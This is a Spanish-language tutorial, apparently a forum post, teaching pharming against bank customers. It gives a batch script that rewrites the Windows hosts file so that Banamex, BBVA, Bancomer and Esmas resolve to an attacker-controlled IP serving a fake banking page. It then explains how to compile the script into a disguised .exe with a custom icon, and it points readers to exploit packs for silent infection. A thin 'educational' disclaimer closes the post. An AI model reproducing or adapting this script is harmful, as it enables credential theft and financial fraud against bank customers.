Bueno, primero que todo necesitaremos saber que es pharming si lo queres poner en practica: aqui les va un poco de definicion.

Entonces Aqui Les Pongo Un Video Educativo:

Ahora que ya sabemos que es pharming y pues phising procederemos a actuar:
Materiales:
El block de notas
Algun pack de iconos
Converter .bat to .exe (es un compilador de archivos batch)

Descargar los materiales: http://www.4shared.com/file/132069384/e534e8fb/Tools.html/Tools.html
En los materiales hay solo unos pocos iconos pero si desean pueden buscar por google y hay encontran miles de iconos, recuerden que los iconos deben tener extension .ico

Ahora lo primero que vamos hacer sera abrir el block de notas y escribir:


@echo off
echo 72.9.233.146 www.banamex.com.mx >> %windir%/system32/drivers/etc/hosts
echo 72.9.233.146 www.bbva.com >> %windir%/system32/drivers/etc/hosts
echo 72.9.233.146 www.bancomer.com.mx >> %/windir%system32/drivers/etc/hosts
echo 72.9.233.146 www.esmas.com >> %windir%/system32/drivers/etc/hosts
exit


Expliquemos un poco,: la direccion ip –72.9.233.146– sera la ip de su hosting donde tengan su scam bancario o de lo que sea(con ip de su hosting me refiero a un hosting con ip dedicada no que hicieron ping a su pagina web y listo ye tengo mi ip por que eso no es asi), entonces esa ip la cambian por la suya, en este caso puse la ip de la pagina web de un juego((esa web con IP dedicada no va a durar toda la vida asi que no se preocupen si no les carga esa pagina)).
La pagina web que en este caso pusimos –www.banamex.com.mx - www.bbva.com - www.bancomer.com.mx - www.esmas.com– seran las paginas webs a las que entraran nuestras victimas y seran redireccionadas a nuestro scam.
Y la ruta –%windir%system32driversetchosts– lo que hace es llamar al archivo hosts que se encuentra en el directorio de –windows > system32 > drivers > etc– para asi añadirle esas lineas nuestras al archivo hosts.

Ya dejemonos de explicaciones y vamos al grano: Ahora le damos clic en guardar como y le ponen cualquier nombre pero con la extencion .bat por ejemplo (file.bat) y nos salimos ahora abrimos nuestro converter .bat to .exe y compilamos nuestro archivo para que quede en .exe y si quieren le cambian el icono desde el mismo compilador y con esto abremos terminado, ahora provemos: ejecutemos nuestro archivo file.exe y veran que no paso nada a simple vista pero ahora vayan a la siguiente ruta WINDOWSsystem32driversetc y abran el archivo hosts con el block de notas y veran nuestras URL`S e IP`S en aquel archivo y eso significara que funciono (cuando ejecuten su archivo file.exe se modificara el archivo hosts, y para desinfectarse solo abran el archivo hosts y borren nuestras URL`S e IP`S que se añadieron y dejamos por defecto la ip 127.0.0.1 y el nombre localhost) o simplemente abran una ventana nueva del internet y escriban una de las direcciones webs que decian en el archivo como por ejemplo www.bbva.com y veran que seran redireccionados a la ip (72.9.233.146) la cual es una pagina web de un juego, y si miran bien la URL se daran cuenta de que nada cambia por que dira lo mismo de www.bbva.com por eso es tan efectivo estos ataques jeje, y para los que piensan en grande por la net existen varios scripts para infectar PC`S de forma silenciosa como el fire pack lite, ice pack entre otros.

Nota:Este documento fue creado de forma educativa y ni el autor ni ayudantes se hacen responsables por los malos usos que les puedan dar a este documento.

Todos Los Derechos Reservados.Fidentis

Este Documento puede ser distribuido, siempre y cuando el nombre del autor permanezca intacto